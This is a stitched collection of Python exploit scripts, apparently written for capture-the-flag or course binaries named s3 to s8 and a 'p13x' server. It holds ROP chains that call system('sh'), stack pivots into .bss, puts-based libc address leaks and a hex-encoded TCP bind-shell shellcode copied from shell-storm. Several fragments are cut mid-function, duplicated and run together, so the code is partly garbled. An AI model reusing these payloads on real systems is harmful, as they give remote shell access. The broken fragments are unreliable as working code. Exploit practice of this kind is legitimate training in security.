payload += struct.pack('L', base - 0x40) payload += struct.pack('L', 0x400630) # read to pivot target.sendbin(payload) target.sendeof() target.tryexpect("If you're cool you'll get a shell.\n") payload = b'S' * 0x20 payload += struct.pack('L', base) payload += struct.pack('L', 0x400630) # read to get control back target.sendbin(payload) target.sendeof() target.tryexpect("If you're cool you'll get a shell.\n") if __name__ == "__main__": setup = binexpect.setup('./s7') target = setup.target() target.setecho(False) # STAGE 1 payload = b'A' * 0x20 payload += struct.pack('L', base - 0x40) # new stack frame payload += struct.pack('L', 0x400630) # read # pivot through main's leave; ret target.tryexpect("What is your password\?\n") target.sendbin(payload) target.sendeof() target.tryexpect("If you're cool you'll get a shell.\n") payload = b'B' * 0x20 payload += struct.pack('L', base) # value for rbp
clear_line("[x] Testing single bytes in context.\n") for x in range(256): do_test(target, (61, x, 61)) clear_line("[x] Testing multiple bytes in context.\n") for x in range(256): for y in range(256): do_test(target, (61, x, y, 61)) clear_line() if __name__ == '__main__': import binexpect setup = binexpect.setup("cat") target = setup.target() target.setecho(False) try: os.system('setterm -cursor off') run_tests(target) finally: os.system('setterm -cursor on') print("[-] Tests done.")
import binascii import time import sys import json import binexpect def rop(*args): return struct.pack('Q'*len(args), *args) target_host = "localhost" #"attack.samsclass.info" # target_port = "10100" #"13010" # setup = binexpect.setup("nc "+ target_host + " " + target_port) s7 = setup.target() s7.setecho(False) s7.tryexpect("Welcome to the p13x Server! buffer = (.*)\nEnter string \(q to quit\)") buf_addr = int(str(s7.match.group(1), 'utf-8'), 16) print ("BUF ADDR: " + hex(buf_addr)) def get_shellcode(port): # simple tcp bind shell, ripped from: http://shell-storm.org/shellcode/files/shellcode-858.php hexcode = "6a025f6a015e6a065a6a29580f054989c04d31d241524152c604240266c7442402PORT4889e641505f6a105a6a31580f0541505f6a015e6a32580f054889e66a104889e241505f6a2b580f054889c76a035e48ffce6a21580f0575f64831f64831d248bf2f2f62696e2f736848c1ef0857545f6a3b580f05" # render the port to BIG endian hexport = str(binascii.hexlify(bytearray([ (port >> 8) & 0xff, port & 0xff])), 'utf-8')
import struct import binascii import time import sys import json import binexpect def rop(*args): return struct.pack('Q' * len(args), *args) target_host = "localhost" #"attack.samsclass.info" # target_port = "10100" #"13010" # setup = binexpect.setup("nc " + target_host + " " + target_port) s7 = setup.target() s7.setecho(False) s7.tryexpect( "Welcome to the p13x Server! buffer = (.*)\nEnter string \(q to quit\)") buf_addr = int(str(s7.match.group(1), 'utf-8'), 16) print("BUF ADDR: " + hex(buf_addr)) def get_shellcode(port): # simple tcp bind shell, ripped from: http://shell-storm.org/shellcode/files/shellcode-858.php hexcode = "6a025f6a015e6a065a6a29580f054989c04d31d241524152c604240266c7442402PORT4889e641505f6a105a6a31580f0541505f6a015e6a32580f054889e66a104889e241505f6a2b580f054889c76a035e48ffce6a21580f0575f64831f64831d248bf2f2f62696e2f736848c1ef0857545f6a3b580f05" # render the port to BIG endian
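#!/usr/bin/env python
"""Exploit for ./s3: ret2system ROP chain over a stack overflow.

Stage 1 plants the string "sh" through the name prompt; stage 2 overflows
the password buffer with a chain that calls system() with rdi pointing at
that string.  Every address is hard-coded, so the binary is assumed to be
non-PIE (text at 0x400000, .bss at 0x601000) -- TODO confirm with checksec.

binexpect is imported inside main() so that the payload builders can be
imported and unit-tested without the harness installed.
"""
import struct

# Gadgets / symbols in ./s3 (fixed addresses => non-PIE assumed).
POP_RDI_RET = 0x4007e3   # pop rdi; ret
SH_ADDR = 0x6010a0       # where stage 1's "sh" ends up -- presumably the name buffer in .bss; verify
SYSTEM = 0x400772        # system()

PASSWORD_PAD = 0x30      # bytes from the start of the password buffer to the saved rbp
SAVED_RBP = b'paddingp'  # overwrites the saved rbp; any value works, system() never returns here


def p64(value):
    """Pack *value* as an explicit 8-byte little-endian word.

    struct's native 'L' is 8 bytes only on LP64 hosts (4 on Windows and on
    32-bit Linux), which would silently corrupt the chain when this script
    runs somewhere other than the target's host.  A fixed '<Q' always
    matches the x86-64 target.
    """
    return struct.pack('<Q', value)


def stage1_name():
    """Name input: the string "sh" NUL-padded to one 8-byte word."""
    return b'sh'.ljust(8, b'\x00')


def stage2_rop():
    """Password input: padding, fake saved rbp, then pop rdi / &"sh" / system()."""
    chain = [
        b'A' * PASSWORD_PAD,
        SAVED_RBP,
        p64(POP_RDI_RET),
        p64(SH_ADDR),    # popped into rdi: the command string for system()
        p64(SYSTEM),
    ]
    return b''.join(chain)


def main():
    """Drive ./s3 through both prompts and hand over the shell."""
    import binexpect

    setup = binexpect.setup('./s3')
    target = setup.target()
    target.setecho(False)

    # tryexpect() takes a regex (the sibling scripts escape '\?' and use
    # '(.*)' groups), so the literal '?' is escaped; unescaped it would only
    # make the preceding character optional and match by accident.
    target.tryexpect(r'What is your name\?')
    target.sendbinline(stage1_name())

    target.tryexpect(r'What is your password\?')
    target.sendbinline(stage2_rop())

    target.tryexpect("If you're cool you'll get a shell.")
    target.pwned()


if __name__ == "__main__":
    main()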
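#!/usr/bin/env python
"""Exploit for ./s4: stack pivot into a ROP chain staged in .bss.

Stage 1 stores the whole chain (plus the "sh" string) in the writable .bss
through the name prompt.  Stage 2 overflows the password buffer so that the
saved rbp points into that staged area and the return address is a
`leave; ret` gadget: `leave` moves rsp there, `pop rbp` eats one word, and
`ret` starts the chain pop rdi / &"sh" / system().

All addresses are hard-coded, so the binary is assumed non-PIE (text at
0x400000, .bss at 0x601000) -- TODO confirm with checksec.  binexpect is
imported inside main() so the payload builders can be unit-tested without it.
"""
import struct

# Gadgets / symbols in ./s4
POP_RDI_RET = 0x4007e3  # pop rdi; ret
SYSTEM = 0x400772       # system()
LEAVE_RET = 0x40077c    # leave; ret -- the pivot gadget

# Layout of the staged chain in .bss
STAGE1_PAD = 0x3d8      # bytes from the start of the name buffer to the chain
SH_ADDR = 0x601490      # where the trailing "sh" word of stage 1 lands (buffer + 0x3f0) -- verify
PIVOT_RBP = 0x601470    # forged saved rbp (original note: "bss + 0x3d8 bytes").
                        # SH_ADDR - 0x18 == PIVOT_RBP + 8, i.e. after `leave`'s
                        # pop rbp consumes the word at PIVOT_RBP, `ret` lands on the
                        # pop-rdi word one slot later; that matches a name buffer at
                        # 0x6010a0 -- TODO confirm against the binary.
PASSWORD_PAD = 0x30     # bytes from the start of the password buffer to the saved rbp


def p64(value):
    """Pack *value* as an explicit 8-byte little-endian word.

    struct's native 'L' is 8 bytes only on LP64 hosts (4 on Windows and on
    32-bit Linux); '<Q' always matches the x86-64 target.
    """
    return struct.pack('<Q', value)


def stage1_chain():
    """Name input: padding, the ROP chain, then the "sh" argument it points at."""
    return b''.join([
        b'A' * STAGE1_PAD,
        p64(POP_RDI_RET),
        p64(SH_ADDR),              # popped into rdi
        p64(SYSTEM),
        b'sh'.ljust(8, b'\x00'),   # lands at SH_ADDR
    ])


def stage2_pivot():
    """Password input: padding, forged saved rbp into .bss, then leave; ret."""
    return b''.join([
        b'A' * PASSWORD_PAD,
        p64(PIVOT_RBP),
        p64(LEAVE_RET),
    ])


def main():
    """Stage the chain, trigger the pivot, hand over the shell."""
    import binexpect

    setup = binexpect.setup('./s4')
    target = setup.target()
    target.setecho(False)

    # tryexpect() takes a regex (sibling scripts escape '\?'), so the literal
    # '?' is escaped rather than left as an "optional previous char" operator.
    target.tryexpect(r'What is your name\?')
    target.sendbinline(stage1_chain())   # sendbinline presumably appends '\n'; it lands past the chain -- verify

    target.tryexpect(r'What is your password\?')
    target.sendbinline(stage2_pivot())

    target.tryexpect("If you're cool you'll get a shell.")
    target.pwned()


if __name__ == "__main__":
    main()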
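#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Exploit for ./s5: re-enter main's read() with a forged rbp to pivot onto .bss.

Stage 1 overflows the password buffer so the saved rbp becomes BASE (an
address in .bss) and execution returns into main just before its
read(0, rbp-0x20, ...) call (per the original gadget note).  That read now
writes stage 2 at BASE-0x20, and the function's own `leave; ret` makes BASE
the new stack: pop rdi / &"sh" / system(), with the "sh" word placed at
BASE+0x20 by the same write.

All addresses are hard-coded, so the binary is assumed non-PIE -- TODO
confirm with checksec.  binexpect is imported inside main() so the payload
builders can be unit-tested without it.
"""
import struct

BASE = 0x601500          # new stack base in .bss; must be writable and otherwise unused -- verify
READ_AGAIN = 0x400670    # original note: read(0, rbp-0x20, 0x400); [...]; leave; ret
POP_RDI_RET = 0x400743   # pop rdi; ret
SYSTEM = 0x4006c7        # system()
BUF_PAD = 32             # bytes from the buffer start to the saved rbp
SH_ADDR = BASE + 0x20    # where stage 2's "sh" word lands: four words after the fake rbp


def p64(value):
    """Pack *value* as an explicit 8-byte little-endian word.

    struct's native 'L' is 8 bytes only on LP64 hosts (4 on Windows and on
    32-bit Linux); '<Q' always matches the x86-64 target.
    """
    return struct.pack('<Q', value)


def stage1_pivot():
    """First password input: saved rbp := BASE, return into main's read()."""
    return b''.join([
        b'A' * BUF_PAD,
        p64(BASE),
        p64(READ_AGAIN),
    ])


def stage2_rop():
    """Second input, written at BASE-0x20: fake rbp, pop rdi / &"sh" / system(), "sh"."""
    return b''.join([
        b'A' * BUF_PAD,            # fills BASE-0x20 .. BASE
        b'BBBBBBBB',               # popped into rbp by the pivoting `leave`
        p64(POP_RDI_RET),          # at BASE+0x08: first word `ret` pops
        p64(SH_ADDR),              # at BASE+0x10: popped into rdi
        p64(SYSTEM),               # at BASE+0x18
        b'sh'.ljust(8, b'\x00'),   # at BASE+0x20 == SH_ADDR
    ])


def main():
    """Pivot onto .bss and run the staged chain."""
    import binexpect

    setup = binexpect.setup('./s5')
    target = setup.target()
    target.setecho(False)

    # tryexpect() takes a regex (sibling scripts escape '\?'), so the literal
    # '?' is escaped rather than left as an "optional previous char" operator.
    target.tryexpect(r'What is your password\?')
    target.sendbinline(stage1_pivot())

    # No prompt in between: the re-entered read() consumes this directly.
    # sendbinline presumably appends '\n', which lands at BASE+0x28, past the chain -- verify.
    target.sendbinline(stage2_rop())
    target.tryexpect("If you're cool you'll get a shell.")


if __name__ == "__main__":
    main()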
import binexpect import struct # 0x4006d1 : leave; ret # 0x400743 : pop rdi; ret # 0x400670 : read(0, rbp-0x20, 0x400); [...];leave; ret # 0x400686 : read(); [...]; leave; ret # 0x4006c7 : system() # 0x600ff8 : .got /!\ # 0x601000 : .got.plt /!\ # 0x601050 : .data # 0x601060 : .bss if __name__ == "__main__": setup = binexpect.setup('./s6') target = setup.target() target.setecho(False) base = 0x601520 # stack # STAGE1: # pivot stack with call to read payload = b'A' * 0x20 payload += struct.pack('L', base - 0x30) # new stack base payload += struct.pack('L', 0x400670) # read(0, rbp-0x20, 0x30); [...];leave; ret # pivot here from main. target.tryexpect('What is your password?') target.sendbin(payload) # STAGE2:
def get(self, symbol): if symbol in self.libc_map: return self.libc_map[symbol] return None def rop(*args): return struct.pack('Q'*len(args), *args) libc_map = LibcMap() setup = binexpect.setup("./s7") s7 = setup.target() s7.setecho(False) s7.tryexpect("Welcome Stranger") s7.tryexpect("What is your password?") def leak(address): payload = bytes('A' * 32, 'utf-8') payload += rop( 0x42424242, # frame pointer 0x00400703, # pop rdi; ret; address, # leak 0x004004c0, # puts@plt
do_test(target, (x,)) clear_line("[x] Testing single bytes in context.\n") for x in range(256): do_test(target, (61, x, 61)) clear_line("[x] Testing multiple bytes in context.\n") for x in range(256): for y in range(256): do_test(target, (61, x, y, 61)) clear_line() if __name__ == '__main__': import binexpect setup = binexpect.setup("cat") target = setup.target() target.setecho(False) try: os.system('setterm -cursor off') run_tests(target) finally: os.system('setterm -cursor on') print("[-] Tests done.")
def get(self, symbol): if symbol in self.libc_map: return self.libc_map[symbol] return None def rop(*args): return struct.pack('Q'*len(args), *args) libc_map = LibcMap() setup = binexpect.setup("./s8") s8 = setup.target() s8.setecho(False) s8.tryexpect("Welcome Stranger") s8.tryexpect("What is your password\?") def leak(address): payload = bytes('A' * 32, 'utf-8') payload += rop( 0x00601800, # frame pointer 0x00400630, # read@main ) s8.sendbin(payload)